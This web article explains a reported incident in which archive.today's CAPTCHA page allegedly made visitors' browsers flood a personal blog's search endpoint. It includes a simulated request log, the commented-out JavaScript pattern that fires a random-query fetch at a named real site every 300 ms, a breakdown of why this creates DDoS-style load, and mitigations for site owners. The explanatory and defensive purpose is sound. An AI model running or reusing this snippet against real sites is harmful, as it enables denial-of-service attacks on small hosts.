Inside the archive.today Incident — Simulation, Evidence & What Site Owners Should Do
Inside the archive.today Incident — Simulation & Technical Walkthrough
A step-by-step visualization of the reported JavaScript pattern, why it can create DDoS-level load on small sites, and what was discussed in public sources. Claims are presented as reported/alleged and attributed below.
Suggested permalink:
inside-archive-today-incident-simulation-evidence
Simulation of Repeated Request Attack
This visual demo shows the request pattern reported in community sources. NO network requests are performed by this page.
300 ms
Requests/sec
3.33Total requests
47Open pages (sim)
1Visual stream (each dot = simulated request)
Tip: move the interval slider to show how volume changes — lower = more requests.
Simulated request log
[Simulated log — safe visual output only]
[2:06:51 AM] GET https://gyrovague.com/?s=9mbsu
[2:06:51 AM] GET https://gyrovague.com/?s=p65pg
[2:06:51 AM] GET https://gyrovague.com/?s=gzrw
[2:06:51 AM] GET https://gyrovague.com/?s=a308c6
[2:06:52 AM] GET https://gyrovague.com/?s=lzp9ezksz
[2:06:52 AM] GET https://gyrovague.com/?s=ox0m
[2:06:52 AM] GET https://gyrovague.com/?s=3w00mvkhk
[2:06:53 AM] GET https://gyrovague.com/?s=fvl6
[2:06:53 AM] GET https://gyrovague.com/?s=9ln2l
[2:06:53 AM] GET https://gyrovague.com/?s=zcalv
[2:06:54 AM] GET https://gyrovague.com/?s=923v1j5n4
[2:06:54 AM] GET https://gyrovague.com/?s=k6m592yc
[2:06:54 AM] GET https://gyrovague.com/?s=c8rk3wdci
[2:06:54 AM] GET https://gyrovague.com/?s=i34jum
[2:06:55 AM] GET https://gyrovague.com/?s=1cpymy5f
[2:06:55 AM] GET https://gyrovague.com/?s=x5uxyc
[2:06:55 AM] GET https://gyrovague.com/?s=j6v27z8w
[2:06:56 AM] GET https://gyrovague.com/?s=gzygn
[2:06:56 AM] GET https://gyrovague.com/?s=3peolyi1
[2:06:56 AM] GET https://gyrovague.com/?s=xlc9
[2:06:57 AM] GET https://gyrovague.com/?s=igywnz7e
[2:06:57 AM] GET https://gyrovague.com/?s=w96jmpx
[2:06:57 AM] GET https://gyrovague.com/?s=on64h
[2:06:57 AM] GET https://gyrovague.com/?s=obo7yv
[2:06:58 AM] GET https://gyrovague.com/?s=vekpm
[2:06:58 AM] GET https://gyrovague.com/?s=9c7i
[2:06:58 AM] GET https://gyrovague.com/?s=09bqaz
[2:06:59 AM] GET https://gyrovague.com/?s=nh6kry7
[2:06:59 AM] GET https://gyrovague.com/?s=jb2dhfk6o
[2:06:59 AM] GET https://gyrovague.com/?s=6qgx2o
[2:07:00 AM] GET https://gyrovague.com/?s=q8t6zj
[2:07:00 AM] GET https://gyrovague.com/?s=jbu7vzyb
[2:07:00 AM] GET https://gyrovague.com/?s=0gs85u20p
[2:07:00 AM] GET https://gyrovague.com/?s=ojc0
[2:07:01 AM] GET https://gyrovague.com/?s=t69neby
[2:07:01 AM] GET https://gyrovague.com/?s=5qdj
[2:07:01 AM] GET https://gyrovague.com/?s=69t8o0
[2:07:02 AM] GET https://gyrovague.com/?s=mp86
[2:07:02 AM] GET https://gyrovague.com/?s=978gw
[2:07:02 AM] GET https://gyrovague.com/?s=s7cocb
[2:07:03 AM] GET https://gyrovague.com/?s=dqt78nh0
[2:07:03 AM] GET https://gyrovague.com/?s=kzrolo
[2:07:03 AM] GET https://gyrovague.com/?s=vkg6
[2:07:03 AM] GET https://gyrovague.com/?s=2zmps
[2:07:04 AM] GET https://gyrovague.com/?s=acz5no66
[2:07:04 AM] GET https://gyrovague.com/?s=r1yn9le6
[2:07:04 AM] GET https://gyrovague.com/?s=skxo4y
// Observed pattern (for explanation only — do NOT run):
// setInterval(function() {
// fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2), { referrerPolicy:"no-referrer", mode:"no-cors" });
// }, 300);
Step-by-Step: How the Reported Code Produces DDoS-Style Load
- Timer starts: The code uses
setInterval(), which runs a callback repeatedly on the client while the page is open. - Each tick builds a unique request: The snippet appends a randomized query (e.g.
?s=abc123) so responses aren't cached by browsers or CDNs. - Requests continue while the tab remains open: A single visitor who leaves the tab open effectively becomes a sustained request source.
- Many visitors = many concurrent request streams: If many people open the archive CAPTCHA page, the number of generated requests multiplies.
- Small servers suffer: Personal blogs and low-tier hosting can be overwhelmed by sustained CPU/database/bandwidth demands — functionally causing outages similar to DDoS attacks.
Reminder: The code pattern above and the impacts described are what community researchers and the original investigation observed and reported. This article attributes those claims to the sources listed below; it does not assert intent or criminal guilt.
Context: Why People Are Alarmed
archive.today (a widely used web-archiving site) is prominent and used by researchers, journalists, and the public. The fact that the reported code runs on its CAPTCHA page — and that the requests target external blogs — raised alarm in multiple communities (Hacker News, Reddit, Lobsters).
Publicly shared correspondence (linked below) contains allegations about the operator's conduct. These allegations include threatening or coercive messages published in a chat log; they are presented here as reports made public via that correspondence and community threads.
Important: individual-level claims are sensitive. Reporting here sticks to "according to public sources" phrasing and provides links so readers can evaluate the documents themselves.
Video Walkthroughs & Demonstrations
Community members recorded walkthroughs that show the script and behavior—these are embedded for convenience.
Primary Sources & Public Threads (read them yourself)
Gyrovague — Detailed investigation (code, screenshots, timeline)
Hacker News discussion (thread)
Lobsters thread
Reddit (r/DataHoarder)
Public correspondence / chat log (published paste)
These sources contain the code sample, screenshots, community analysis, and the published correspondence. Please read them directly for full context.
Recommended Mitigations for Site Owners
- Rate-limit search endpoints and expensive queries (return 429/503 when under heavy load).
- Cache common responses and treat very short random queries as low-cost cached hits.
- Use CDN or WAF to detect and block repetitive client-side request patterns.
- Monitor logs for repeated similar requests and save sample headers for abuse reporting.
- Consider temporary blocking of the archive domain in server-side rules while investigating.
Comments
Post a Comment